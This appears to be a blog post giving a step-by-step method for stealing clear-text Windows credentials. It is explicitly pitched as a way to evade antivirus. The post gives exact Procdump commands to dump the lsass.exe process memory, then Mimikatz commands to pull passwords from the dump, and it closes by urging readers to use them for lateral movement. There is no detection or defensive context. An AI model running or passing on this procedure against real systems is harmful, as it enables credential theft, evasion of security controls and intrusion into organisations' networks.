Extracting Clear Text Passwords Using Procdump and Mimikatz

Most of us are in situation where you want to dump the credentials using Mimikatz but Antivirus is preventing you. Antivirus is not stopping/pausing or nor you are able to add Mimikatz to exception list of AV.

The technique involves obtaining passwords in clear text from a server without running “malicious” code in it. In this way we avoid having to deal with antivirus evasion techniques and other headaches.

Let sum up the entire process of same.
Grab the latest release of Mimikatz from below link :-

Procdump Binary URL :-

As Procdump is a legitimate Microsoft tool, it's not detected by AntiVirus. The goal is to dump the lsass.exe process, which contains the credentials, and then feed this dump to mimikatz.

Run cmd.exe with Admin rights. 
  • Upload the “Procdump” tool to the server.
  • Dump the memory space of lsass process to the file lsass.dmp with the commands:
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp ==> For 32 bits system
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp ==> For 64 bits system
  • Download the file lsass.dmp generated from server to own machine.
  • Launch mimikatz against the lsass.dmp file with the commands:
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full

Keep in mind that for this attack to work, the computer that runs mimikatz must have the same architecture as the target machine. Graphically, the author of mimikatz has generated a compatibility chart:


Now use these passwords in Lateral Movement over the network.

Comments

Popular Posts